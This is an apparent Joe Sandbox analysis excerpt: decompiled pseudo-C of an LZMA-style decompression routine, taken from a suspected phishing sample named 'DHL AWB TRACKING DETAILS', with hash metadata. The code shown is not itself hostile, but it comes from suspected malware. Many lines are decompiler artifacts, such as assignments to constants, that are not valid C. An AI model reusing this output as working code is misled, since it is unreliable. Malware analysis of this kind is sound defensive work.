                    												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    												goto L76;
                    											case 0xa:
                    												goto L0;
                    											case 0xb:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__ecx =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x20);
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												} else {
                    													__eax =  *(__ebp - 0x24);
                    												}
                    												__ecx =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												goto L88;
                    											case 0xc:
                    												L99:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xc;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t334 = __ebp - 0x70;
                    												 *_t334 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t334;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												__eax =  *(__ebp - 0x2c);
                    												goto L101;
                    											case 0xd:
                    												L37:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xd;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t122 = __ebp - 0x70;
                    												 *_t122 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t122;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L39:
                    												__eax =  *(__ebp - 0x40);
                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    													goto L48;
                    												}
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													goto L54;
                    												}
                    												L41:
                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    												 *(__ebp - 0x48) = __eax;
                    												__eax = __eax + 1;
                    												__eax = __eax << 8;
                    												__eax = __eax + __ebx;
                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edx = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													 *(__ebp - 0x40) = 1;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													__ebx = __ebx + __ebx + 1;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edx;
                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L39;
                    												} else {
                    													goto L37;
                    												}
                    											case 0xe:
                    												L46:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xe;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t156 = __ebp - 0x70;
                    												 *_t156 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t156;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												while(1) {
                    													L48:
                    													__eflags = __ebx - 0x100;
                    													if(__ebx >= 0x100) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x58);
                    													__edx = __ebx + __ebx;
                    													__ecx =  *(__ebp - 0x10);
                    													__esi = __edx + __eax;
                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                    													__ax =  *__esi;
                    													 *(__ebp - 0x54) = __esi;
                    													__edi = __ax & 0x0000ffff;
                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    													__eflags =  *(__ebp - 0xc) - __ecx;
                    													if( *(__ebp - 0xc) >= __ecx) {
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    														__cx = __ax;
                    														_t170 = __edx + 1; // 0x1
                    														__ebx = _t170;
                    														__cx = __ax >> 5;
                    														__eflags = __eax;
                    														 *__esi = __ax;
                    													} else {
                    														 *(__ebp - 0x10) = __ecx;
                    														0x800 = 0x800 - __edi;
                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    														__ebx = __ebx + __ebx;
                    														 *__esi = __cx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														continue;
                    													} else {
                    														goto L46;
                    													}
                    												}
                    												L54:
                    												_t173 = __ebp - 0x34;
                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    												__eflags =  *_t173;
                    												goto L55;
                    											case 0xf:
                    												L58:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xf;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t203 = __ebp - 0x70;
                    												 *_t203 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t203;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L60:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													L55:
                    													__al =  *(__ebp - 0x44);
                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    													goto L56;
                    												}
                    												L61:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t217 = __edx + 1; // 0x1
                    													__ebx = _t217;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L60;
                    												} else {
                    													goto L58;
                    												}
                    											case 0x10:
                    												L109:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x10;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t365 = __ebp - 0x70;
                    												 *_t365 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t365;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												goto L111;
                    											case 0x11:
                    												goto L69;
                    											case 0x12:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 0x58);
                    													 *(__ebp - 0x84) = 0x13;
                    													__esi =  *(__ebp - 0x58) + 2;
                    													while(1) {
                    														L132:
                    														 *(_t613 - 0x54) = _t606;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												__eflags = __eax;
                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                    												goto L130;
                    											case 0x13:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													_t469 = __ebp - 0x58;
                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                    													__eflags =  *_t469;
                    													 *(__ebp - 0x30) = 0x10;
                    													 *(__ebp - 0x40) = 8;
                    													L144:
                    													 *(__ebp - 0x7c) = 0x14;
                    													goto L145;
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												 *(__ebp - 0x30) = 8;
                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    												L130:
                    												 *(__ebp - 0x58) = __eax;
                    												 *(__ebp - 0x40) = 3;
                    												goto L144;
                    											case 0x14:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    												__eax =  *(__ebp - 0x80);
                    												 *(_t613 - 0x88) = _t533;
                    												goto L1;
                    											case 0x15:
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xb;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    												goto L120;
                    											case 0x16:
                    												__eax =  *(__ebp - 0x30);
                    												__eflags = __eax - 4;
                    												if(__eax >= 4) {
                    													_push(3);
                    													_pop(__eax);
                    												}
                    												__ecx =  *(__ebp - 4);
                    												 *(__ebp - 0x40) = 6;
                    												__eax = __eax << 7;
                    												 *(__ebp - 0x7c) = 0x19;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L145;
                    											case 0x17:
                    												L145:
                    												__eax =  *(__ebp - 0x40);
                    												 *(__ebp - 0x50) = 1;
                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    												goto L149;
                    											case 0x18:
                    												L146:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x18;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t484 = __ebp - 0x70;
                    												 *_t484 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t484;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L148:
                    												_t487 = __ebp - 0x48;
                    												 *_t487 =  *(__ebp - 0x48) - 1;
                    												__eflags =  *_t487;
                    												L149:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__ecx =  *(__ebp - 0x40);
                    													__ebx =  *(__ebp - 0x50);
                    													0 = 1;
                    													__eax = 1 << __cl;
                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    													__eax =  *(__ebp - 0x7c);
                    													 *(__ebp - 0x44) = __ebx;
                    													while(1) {
                    														 *(_t613 - 0x88) = _t533;
                    														goto L1;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x50);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    												__eax =  *(__ebp - 0x58);
                    												__esi = __edx + __eax;
                    												 *(__ebp - 0x54) = __esi;
                    												__ax =  *__esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													__cx = __ax >> 5;
                    													__eax = __eax - __ecx;
                    													__edx = __edx + 1;
                    													__eflags = __edx;
                    													 *__esi = __ax;
                    													 *(__ebp - 0x50) = __edx;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L148;
                    												} else {
                    													goto L146;
                    												}
                    											case 0x19:
                    												__eflags = __ebx - 4;
                    												if(__ebx < 4) {
                    													 *(__ebp - 0x2c) = __ebx;
                    													L119:
                    													_t393 = __ebp - 0x2c;
                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                    													__eflags =  *_t393;
                    													L120:
                    													__eax =  *(__ebp - 0x2c);
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    														goto L170;
                    													}
                    													__eflags = __eax -  *(__ebp - 0x60);
                    													if(__eax >  *(__ebp - 0x60)) {
                    														goto L171;
                    													}
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    													__eax =  *(__ebp - 0x30);
                    													_t400 = __ebp - 0x60;
                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    													__eflags =  *_t400;
                    													goto L123;
                    												}
                    												__ecx = __ebx;
                    												__eax = __ebx;
                    												__ecx = __ebx >> 1;
                    												__eax = __ebx & 0x00000001;
                    												__ecx = (__ebx >> 1) - 1;
                    												__al = __al | 0x00000002;
                    												__eax = (__ebx & 0x00000001) << __cl;
                    												__eflags = __ebx - 0xe;
                    												 *(__ebp - 0x2c) = __eax;
                    												if(__ebx >= 0xe) {
                    													__ebx = 0;
                    													 *(__ebp - 0x48) = __ecx;
                    													L102:
                    													__eflags =  *(__ebp - 0x48);
                    													if( *(__ebp - 0x48) <= 0) {
                    														__eax = __eax + __ebx;
                    														 *(__ebp - 0x40) = 4;
                    														 *(__ebp - 0x2c) = __eax;
                    														__eax =  *(__ebp - 4);
                    														__eax =  *(__ebp - 4) + 0x644;
                    														__eflags = __eax;
                    														L108:
                    														__ebx = 0;
                    														 *(__ebp - 0x58) = __eax;
                    														 *(__ebp - 0x50) = 1;
                    														 *(__ebp - 0x44) = 0;
                    														 *(__ebp - 0x48) = 0;
                    														L112:
                    														__eax =  *(__ebp - 0x40);
                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    															_t391 = __ebp - 0x2c;
                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    															__eflags =  *_t391;
                    															goto L119;
                    														}
                    														__eax =  *(__ebp - 0x50);
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    														__eax =  *(__ebp - 0x58);
                    														__esi = __edi + __eax;
                    														 *(__ebp - 0x54) = __esi;
                    														__ax =  *__esi;
                    														__ecx = __ax & 0x0000ffff;
                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    														__eflags =  *(__ebp - 0xc) - __edx;
                    														if( *(__ebp - 0xc) >= __edx) {
                    															__ecx = 0;
                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    															__ecx = 1;
                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    															__ebx = 1;
                    															__ecx =  *(__ebp - 0x48);
                    															__ebx = 1 << __cl;
                    															__ecx = 1 << __cl;
                    															__ebx =  *(__ebp - 0x44);
                    															__ebx =  *(__ebp - 0x44) | __ecx;
                    															__cx = __ax;
                    															__cx = __ax >> 5;
                    															__eax = __eax - __ecx;
                    															__edi = __edi + 1;
                    															__eflags = __edi;
                    															 *(__ebp - 0x44) = __ebx;
                    															 *__esi = __ax;
                    															 *(__ebp - 0x50) = __edi;
                    														} else {
                    															 *(__ebp - 0x10) = __edx;
                    															0x800 = 0x800 - __ecx;
                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    															 *__esi = __dx;
                    														}
                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                    														if( *(__ebp - 0x10) >= 0x1000000) {
                    															L111:
                    															_t368 = __ebp - 0x48;
                    															 *_t368 =  *(__ebp - 0x48) + 1;
                    															__eflags =  *_t368;
                    															goto L112;
                    														} else {
                    															goto L109;
                    														}
                    													}
                    													__ecx =  *(__ebp - 0xc);
                    													__ebx = __ebx + __ebx;
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    														__ecx =  *(__ebp - 0x10);
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    														__ebx = __ebx | 0x00000001;
                    														__eflags = __ebx;
                    														 *(__ebp - 0x44) = __ebx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L101:
                    														_t338 = __ebp - 0x48;
                    														 *_t338 =  *(__ebp - 0x48) - 1;
                    														__eflags =  *_t338;
                    														goto L102;
                    													} else {
                    														goto L99;
                    													}
                    												}
                    												__edx =  *(__ebp - 4);
                    												__eax = __eax - __ebx;
                    												 *(__ebp - 0x40) = __ecx;
                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    												goto L108;
                    											case 0x1a:
                    												L56:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1a;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x68);
                    												__al =  *(__ebp - 0x5c);
                    												__edx =  *(__ebp - 8);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *( *(__ebp - 0x68)) = __al;
                    												__ecx =  *(__ebp - 0x14);
                    												 *(__ecx +  *(__ebp - 8)) = __al;
                    												__eax = __ecx + 1;
                    												__edx = 0;
                    												_t192 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t192;
                    												goto L80;
                    											case 0x1b:
                    												L76:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1b;
                    													goto L170;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t275 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t275;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												_t284 = __ebp - 0x64;
                    												 *_t284 =  *(__ebp - 0x64) - 1;
                    												__eflags =  *_t284;
                    												 *( *(__ebp - 0x68)) = __cl;
                    												L80:
                    												 *(__ebp - 0x14) = __edx;
                    												goto L81;
                    											case 0x1c:
                    												while(1) {
                    													L123:
                    													__eflags =  *(__ebp - 0x64);
                    													if( *(__ebp - 0x64) == 0) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__edx =  *(__ebp - 8);
                    													__cl =  *(__eax + __edx);
                    													__eax =  *(__ebp - 0x14);
                    													 *(__ebp - 0x5c) = __cl;
                    													 *(__eax + __edx) = __cl;
                    													__eax = __eax + 1;
                    													__edx = 0;
                    													_t414 = __eax %  *(__ebp - 0x74);
                    													__eax = __eax /  *(__ebp - 0x74);
                    													__edx = _t414;
                    													__eax =  *(__ebp - 0x68);
                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    													__eflags =  *(__ebp - 0x30);
                    													 *( *(__ebp - 0x68)) = __cl;
                    													 *(__ebp - 0x14) = _t414;
                    													if( *(__ebp - 0x30) > 0) {
                    														continue;
                    													} else {
                    														L81:
                    														 *(__ebp - 0x88) = 2;
                    														goto L1;
                    													}
                    												}
                    												 *(__ebp - 0x88) = 0x1c;
                    												goto L170;
                    										}
                    									}
                    									L171:
                    									_t535 = _t534 | 0xffffffff;
                    									goto L172;
                    								}
                    							}
                    						}
                    					}
                    					goto L1;
                    				}
                    			}














                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                    • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                    • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                    • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406355() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						 *(_t613 - 0x84) = 0xa;
                    						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                    					} else {
                    						 *(__ebp - 0x84) = 9;
                    						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    					}
                    					while(1) {
                    						 *(_t613 - 0x54) = _t606;
                    						while(1) {
                    							L133:
                    							_t531 =  *_t606;
                    							_t589 = _t531 & 0x0000ffff;
                    							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    							if( *(_t613 - 0xc) >= _t565) {
                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    								 *(_t613 - 0x40) = 1;
                    								_t532 = _t531 - (_t531 >> 5);
                    								 *_t606 = _t532;
                    							} else {
                    								 *(_t613 - 0x10) = _t565;
                    								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    							}
                    							if( *(_t613 - 0x10) >= 0x1000000) {
                    								goto L139;
                    							}
                    							L137:
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 5;
                    								L170:
                    								_t568 = 0x22;
                    								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    								_t535 = 0;
                    								L172:
                    								return _t535;
                    							}
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							L139:
                    							_t533 =  *(_t613 - 0x84);
                    							while(1) {
                    								 *(_t613 - 0x88) = _t533;
                    								while(1) {
                    									L1:
                    									_t534 =  *(_t613 - 0x88);
                    									if(_t534 > 0x1c) {
                    										break;
                    									}
                    									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                    										case 0:
                    											if( *(_t613 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    											_t534 =  *( *(_t613 - 0x70));
                    											if(_t534 > 0xe1) {
                    												goto L171;
                    											}
                    											_t538 = _t534 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t570);
                    											_push(9);
                    											_pop(_t571);
                    											_t609 = _t538 / _t570;
                    											_t540 = _t538 % _t570 & 0x000000ff;
                    											asm("cdq");
                    											_t604 = _t540 % _t571 & 0x000000ff;
                    											 *(_t613 - 0x3c) = _t604;
                    											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                    											_t612 = (0x300 << _t604 + _t609) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    												L10:
                    												if(_t612 == 0) {
                    													L12:
